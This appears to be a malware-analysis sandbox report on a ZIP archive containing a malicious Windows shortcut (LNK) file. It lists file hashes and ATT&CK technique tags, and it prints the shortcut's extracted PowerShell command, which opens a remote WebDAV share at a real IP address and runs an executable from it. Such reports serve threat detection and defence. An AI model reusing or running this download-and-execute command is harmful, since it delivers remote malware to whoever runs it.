Malicious
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849[...]fd7.zip
ZIP Archive | MD5: 0986e89bec41533ac56b722bff6aa0fa | Size: 1.06 KB | application/zip
ZIP Archive
MD5: 0986e89bec41533ac56b722bff6aa0fa
Size: 1.06 KB
application/zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
General
Structural Analysis
Config.0
Yara Rules4
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 0986e89bec41533ac56b722bff6aa0fa
|
| Sha1 | 0aebff2cf0de14844fceba56bfc7ef84f42dfcbf
|
| Sha256 | 70e8f69d36ad1869ae48a74e8f5b757e7c9b74a19231110e8796395385a92872
|
| Sha384 | c5bda3de2b9646cc3f7640f7726538969c923feed204a6dcd1845f3aeabb73385d39f20d0d7d69701d45bf557c29d14d
|
| Sha512 | bfd92f0fa6f9a39e1ecff8ffab008110bbd4d5b07d90fd942539cb65300476741588e35c3101f35e3b90cdd9106dd6bd94e92fa25139f911c638b97110dcd6f3
|
| SSDeep | 24:xExNo/wLXnujh8nxHfX8zsrTS8mgttd3DMtYvET:xEn0wLXnuj+yOTS8ldVvET
|
| TLSH | 2611D85D0ACA1823D453103541ABA19DCF88C238C43AC4B2C72CD47B3FAB2894DB9E25
|
File Structure
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\1.exe |
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip (1.06 KB)
File Structure
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\1.exe Malicious |
d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.zip > d7c0655c6f1db4acb14bb4c1ddec34ce8f3849c9e0bf9e28d28c8f1c00121fd7.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.